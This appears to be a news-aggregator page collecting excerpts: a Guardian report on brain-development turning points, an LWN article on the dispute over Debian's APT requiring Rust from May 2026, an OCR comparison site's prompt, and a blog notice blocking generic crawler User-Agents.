Meanwhile, grey and white matter grow rapidly in volume, so that cortical thickness — the distance between outer grey matter and inner white matter — reaches a peak, and cortical folding, the characteristic ridges on the outer brain, stabilises.
In the second “epoch” of the brain, the adolescence era, white matter continues to grow in volume, so organisation of the brain’s communications networks is increasingly refined. This era is defined by steadily increasing efficiency of connections across the whole brain, which is related to enhanced cognitive performance. The epochs were defined by the brain remaining on a constant trend of development over a sustained period, rather than staying in a fixed state throughout.
“We’re definitely not saying that people in their late 20s are going to be acting like teenagers, or even that their brain looks like that of a teenager,” said Alexa Mousley, who led the research. “It’s really the pattern of change.”
She added that the findings could give insights into risk factors for mental health disorders, which most frequently emerge during the adolescent period.
At around the age of 32 the strongest overall shift in trajectory is seen. Life events such as parenthood may play a role in some of the changes seen, although the research did not explicitly test this. “We know that women who give birth, their brain changes afterwards,” said Mousley. “It’s reasonable to assume that there could be a relationship between these milestones and what’s happening in the brain.”
From 32 years, the brain architecture appears to stabilise compared with previous phases, corresponding with a “plateau in intelligence and personality” based on other studies. Brain regions also become more compartmentalised.
The final two turning points were defined by decreases in brain connectivity, which were believed to be related to ageing and degeneration of white matter in the brain.
...
Read the original on www.theguardian.com »
The following subscription-only content has been made available to you by an LWN subscriber. Thousands of subscribers depend on LWN for the best news from the Linux and free software communities. If you enjoy this article, please consider subscribing to LWN. Thank you for visiting LWN.net!
It is rarely newsworthy when a project or package picks up a new dependency. However, changes in a core tool like Debian’s Advanced Package
Tool (APT) can have far-reaching effects. For example, Julian Andres Klode’s declaration
that APT would require Rust in May 2026 means that a few of Debian’s unofficial ports must either acquire a working Rust toolchain or depend on an old version of APT. This has raised several questions within the project, particularly about the ability of a single maintainer to make changes that have widespread impact.
On October 31, Klode sent an announcement to the debian-devel mailing list that he intended to introduce Rust dependencies and code into APT as soon as May 2026:
This extends at first to the Rust compiler and standard library, and the Sequoia ecosystem.
In particular, our code to parse .deb, .ar, .tar, and the HTTP signature verification code would strongly benefit from memory safe languages and a stronger approach to unit testing.
If you maintain a port without a working Rust toolchain, please ensure it has one within the next 6 months, or sunset the port.
Klode added this was necessary so that the project as a whole could move forward, rely on modern technologies, “and not be held back by
trying to shoehorn modern software on retro computing
devices”. Some Debian developers have welcomed the news. Paul Tagliamonte acknowledged
that it would impact unofficial Debian ports but called the push toward Rust “”.
However, John Paul Adrian Glaubitz complained
that Klode’s wording was unpleasant and that the approach was confrontational. In another
message, he explained that he was not against adoption of Rust; he had worked on enabling Rust on many of the Debian architectures and helped to fix architecture-specific bugs in the Rust toolchain as well as LLVM upstream. However, the message strongly suggested there was no room for a change in plan: Klode had ended his message with “”, which invited no further discussion. Glaubitz was one of a few Debian developers who expressed discomfort with Klode’s communication style in the message.
Klode noted, briefly, that Rust was already a hard requirement for all Debian release architectures and ports, except for Alpha (alpha), Motorola 680x0 (m68k),
PA-RISC (hppa), and
SuperH (sh4), because of APT’s use of the Sequoia-PGP
project’s sqv tool to verify OpenPGP
signatures. APT falls back to using the GNU Privacy Guard signature-verification tool, gpgv, on ports that do not have a Rust compiler. By depending directly on Rust, though, APT itself would not be available on ports without a Rust compiler. LWN recently
covered the state of Linux architecture support, and the status of Rust support for each one.
None of the ports listed by Klode are among those officially
supported by Debian today, or targeted for support in Debian 14 (“forky”). The sh4 port has never been officially supported, and none of the other ports have been supported since Debian 6.0. The actual impact on the ports lacking Rust is also less dramatic than it sounded at first. Glaubitz assured
Antoni Boucher that “”, but phrasing it that way “gets more attention in the
news”. Boucher is the maintainer of rustc_codegen_gcc, a GCC
ahead-of-time code generator for Rust. Nothing, Glaubitz said, stops ports from using a non-Rust version of APT until Boucher and others manage to bootstrap Rust for those ports.
David Kalnischkies, who is also a major
contributor to APT, suggested
that if the goal is to reduce bugs, it would be better to remove the code that is used to parse the .deb, .ar, and .tar formats that Klode mentioned from APT entirely. It is only needed for two tools,
and , he said, and the only “” of
was by Klode’s employer, Canonical, for its Launchpad software-collaboration platform. If those were taken out of the main APT code base, then it would not matter whether they were written in Rust, Python, or another language, since the tools are not directly necessary for any given port.
Kalnischkies also questioned the claim that Rust was necessary to achieve the stronger approach to unit testing that Klode mentioned:
You can certainly do unit tests in C++, we do. The main problem is that someone has to write those tests. Like docs.
Your new solver e.g. has none (apart from our preexisting integration tests). You don’t seriously claim that is because of C++ ? If you don’t like GoogleTest, which is what we currently have, I could suggest doctest (as I did in previous installments). Plenty other frameworks exist with similar or different styles.
Klode has not responded to those comments yet, which is a bit unfortunate given the fact that introducing hard dependencies on Rust has an impact beyond his own work on APT. It may well be that he has good answers to the questions, but it can also give the impression that Klode is simply embracing a trend toward Rust. He is involved
in the Ubuntu work to migrate from GNU Coreutils to the Rust-based uutils. The reasons given for that work, again, are around modernization and better security—but security is not automatically guaranteed simply by switching to Rust, and there are a number of other considerations.
For example, Adrian Bunk pointed
out that there are a number of Debian teams, as well as tooling, that will be impacted by writing some of APT in Rust. The release notes for Debian 13 (“trixie”) mention
that Debian’s infrastructure “currently has problems with
rebuilding packages of types that systematically use static
linking”, such as those with code written in Go and Rust. Thus, “these packages will be
covered by limited security support until the infrastructure is
improved to deal with them maintainably”. Limited security support means that updates to Rust libraries are likely to only be released when Debian publishes a point release, which happens about every two months. The security team has specifically
stated that is fully supported, but there are still outstanding problems.
Due to the static-linking issue, any time one of ’s dependencies, currently more than 40 Rust crates, have to be rebuilt due to a security issue, (at least potentially) also needs to be rebuilt. There are also difficulties in tracking CVEs for all of its dependencies, and understanding when a security vulnerability in a Rust crate may require updating a Rust program that depends on it.
Fabian Grünbichler, a maintainer of Debian’s Rust toolchain, listed
several outstanding problems Debian has with dealing with Rust packages. One of the largest is the need for a consistent Debian policy for declaring statically linked libraries. In 2022, Guillem Jover added a control field for Debian packages called Static-Built-Using (SBU), which would list the source packages used to build a binary package. This would indicate when a binary package needs to be rebuilt due to an update in another source package. For example, depends on more than 40 Rust crates that are packaged for Debian. Without declaring the SBUs, it may not be clear if needs to be updated when one of its dependencies is updated. Debian has been working on a policy
requirement for SBU since April 2024, but it is not yet finished or adopted.
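For illustration, such a field in a package's control data simply enumerates the exact source packages whose code ended up statically linked into the binary, so the archive tooling knows what must be rebuilt when one of them changes. A hypothetical stanza line (the package names and versions are invented):

Static-Built-Using: rust-sequoia-openpgp (= 1.20.0-1), rust-clap (= 4.4.18-1), rustc (= 1.85.0+dfsg1-1)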
The discussion sparked by Grünbichler makes clear that most of Debian’s Rust-related problems are in the process of being solved. However, there’s no evidence that Klode explored the problems before declaring that APT would depend on Rust, or even asked “is this a reasonable time frame to introduce this dependency?”
Debian’s tagline, or at least one of its taglines, is “the universal operating system”, meaning that the project aims to run on a wide variety of hardware (old and new) and be usable on the desktop, server, IoT devices, and more. The “Why Debian” page lists a number of reasons users and developers should choose the distribution: multiple hardware
architectures, long-term
support, and its democratic governance
structure are just a few of the arguments it puts forward in favor of Debian. It also notes that “Debian cannot be controlled by a
single company”. A single developer employed by a company to work on Debian tools pushing a change that seems beneficial to that company, without discussion or debate, that impacts multiple hardware architectures and that requires other volunteers to do unplanned work or meet an artificial deadline seems to go against many of the project’s stated values.
Debian, of course, does have checks and balances that could be employed if other Debian developers feel it necessary. Someone could, for example, appeal to Debian’s Technical Committee, or sponsor a general resolution to override a developer if they cannot be persuaded by discussion alone. That happened recently when the committee required systemd
maintainers to provide the directory “until
a satisfactory migration of impacted software has occurred and Policy
updated accordingly”.
However, it also seems fair to point out that Debian can move slowly, even glacially, at times. APT added
support for the DEB822
format for its source information lists in 2015. Despite APT supporting that format for years, Klode faced resistance in 2021, when he pushed
for Debian to move to the new format ahead of the Debian 12 (“bookworm”) release, but was unsuccessful. It is now the default for trixie with the move to APT 3.0, though APT will continue to support the old format for years to come.
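For readers who have not seen the two formats side by side, the change is purely syntactic: the traditional one-line-per-entry sources.list versus a multi-field DEB822 stanza. Roughly (using a generic Debian mirror and suite as the example):

# Old one-line style, e.g. in /etc/apt/sources.list
deb http://deb.debian.org/debian trixie main

# DEB822 style, e.g. in /etc/apt/sources.list.d/debian.sources
Types: deb
URIs: http://deb.debian.org/debian
Suites: trixie
Components: main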
The fact is, regardless of what Klode does with APT, more and more free software is being written (or rewritten) in Rust. Making it easier to support that software when it is packaged for Debian is to everyone’s benefit. Perhaps the project needs some developers who will be aggressive about pushing the project to move more quickly in improving its support for Rust. However, what is really needed is more developers lending a hand to do the work that is needed to support Rust in Debian and elsewhere, such as . It does not seem in keeping with Debian’s community focus for a single developer to simply declare dependencies that other volunteers will have to scramble to support.
...
Read the original on lwn.net »
Upload an image to start an anonymous OCR battle.
...
Read the original on www.ocrarena.ai »
You’re probably reading this page because you’ve attempted to access some part of my blog (Wandering
Thoughts) or CSpace, the wiki thing it’s part of. Unfortunately whatever you’re using to do so has a HTTP User-Agent header value that is too generic or otherwise excessively suspicious. Unfortunately, as of early 2025 there’s a plague of high volume crawlers (apparently in part to gather data for LLM training) that behave like this. To reduce the load on Wandering Thoughts I’m experimenting with (attempting to) block all of them, and you’ve run into this.
All HTTP User-Agent headers should clearly identify what they are, and for non-browser user agents, they should identify not just the software involved but also who specifically is using that software. An extremely generic value such as “Go-http-client/1.1” is not something that I consider acceptable any more.
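For anyone writing a small fetcher in, say, Python, sending an identifying User-Agent is a one-line change. A minimal example (the agent string, bot URL, and contact address are placeholders you would replace with your own):

import urllib.request

req = urllib.request.Request(
    "https://utcc.utoronto.ca/~cks/space/blog/",
    headers={
        # Identify both the software and who runs it, so a site operator can tell
        # you apart from anonymous mass crawlers and contact you if there is a problem.
        "User-Agent": "example-feed-reader/1.0 (+https://example.org/bot; contact: you@example.org)",
    },
)
with urllib.request.urlopen(req) as resp:
    page = resp.read()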
...
Read the original on utcc.utoronto.ca »
10HN is also available as an iOS App
If you visit 10HN only rarely, check out the best articles from the past week.
If you like 10HN please leave feedback and share
Visit pancik.com for more.